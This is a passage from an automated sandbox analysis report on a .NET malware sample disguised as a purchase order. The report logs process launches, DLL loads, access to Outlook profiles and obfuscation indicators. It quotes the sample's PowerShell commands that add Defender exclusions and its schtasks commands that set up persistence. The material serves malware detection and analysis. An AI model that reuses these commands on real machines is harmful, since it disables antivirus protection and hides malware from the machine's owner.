                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess created: C:\Users\user\AppData\Roaming\VvtddClQv.exe "C:\Users\user\AppData\Roaming\VvtddClQv.exe"
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-0Y9005373R664.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VvtddClQv.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpB962.tmp"Jump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeProcess created: C:\Users\user\Desktop\PO-0Y9005373R664.exe "C:\Users\user\Desktop\PO-0Y9005373R664.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VvtddClQv" /XML "C:\Users\user\AppData\Local\Temp\tmpD806.tmp"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeProcess created: C:\Users\user\AppData\Roaming\VvtddClQv.exe "C:\Users\user\AppData\Roaming\VvtddClQv.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeAutomated click: OK
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeAutomated click: OK
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO-0Y9005373R664.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                        Source: PO-0Y9005373R664.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: PO-0Y9005373R664.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: PO-0Y9005373R664.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: QUbn.pdb source: PO-0Y9005373R664.exe, VvtddClQv.exe.0.dr
                        Source: Binary string: QUbn.pdbH source: PO-0Y9005373R664.exe, VvtddClQv.exe.0.dr

                        Data Obfuscation

                        barindex
                        Source: PO-0Y9005373R664.exe, fV.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: VvtddClQv.exe.0.dr, fV.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, TP.cs.Net Code: aJ0(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),aJ0(typeof(Type).TypeHandle)})
                        Source: 0.2.PO-0Y9005373R664.exe.5500000.5.raw.unpack, TP.cs.Net Code: aJ0(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),aJ0(typeof(Type).TypeHandle)})
                        Source: 0.2.PO-0Y9005373R664.exe.3d25e58.4.raw.unpack, TP.cs.Net Code: aJ0(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),aJ0(typeof(Type).TypeHandle)})
                        Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, TP.cs.Net Code: aJ0(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),aJ0(typeof(Type).TypeHandle)})
                        Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, Bl.cs.Net Code: lI
                        Source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, Bl.cs.Net Code: RQ System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.PO-0Y9005373R664.exe.7550000.8.raw.unpack, XZhbQ8WE4aovuBFcQB.cs.Net Code: BUuk4eyquk System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.PO-0Y9005373R664.exe.5500000.5.raw.unpack, Bl.cs.Net Code: lI
                        Source: 0.2.PO-0Y9005373R664.exe.5500000.5.raw.unpack, Bl.cs.Net Code: RQ System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.PO-0Y9005373R664.exe.3e8bed0.2.raw.unpack, XZhbQ8WE4aovuBFcQB.cs.Net Code: BUuk4eyquk System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.PO-0Y9005373R664.exe.3d25e58.4.raw.unpack, Bl.cs.Net Code: lI
                        Source: 0.2.PO-0Y9005373R664.exe.3d25e58.4.raw.unpack, Bl.cs.Net Code: RQ System.Reflection.Assembly.Load(byte[])
                        Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, Bl.cs.Net Code: lI
                        Source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, Bl.cs.Net Code: RQ System.Reflection.Assembly.Load(byte[])
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.3e4a4d0.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.3e304b0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.VvtddClQv.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.VvtddClQv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.VvtddClQv.exe.29b9d20.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.PO-0Y9005373R664.exe.2aa9d1c.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1745375841.0000000003E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1745375841.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1821108974.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1744582061.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: PO-0Y9005373R664.exe PID: 6964, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: VvtddClQv.exe PID: 3788, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: VvtddClQv.exe PID: 4780, type: MEMORYSTR
                        Source: PO-0Y9005373R664.exeStatic PE information: 0xFB4B49A3 [Wed Aug 8 11:21:07 2103 UTC]
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_04D642D7 push ebx; ret 10_2_04D642DA
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_04D6CDF3 push ecx; retf 10_2_04D6CDF4
                        Source: C:\Users\user\AppData\Roaming\VvtddClQv.exeCode function: 10_2_04D6CE36 push cs; retf 10_2_04D6CE37
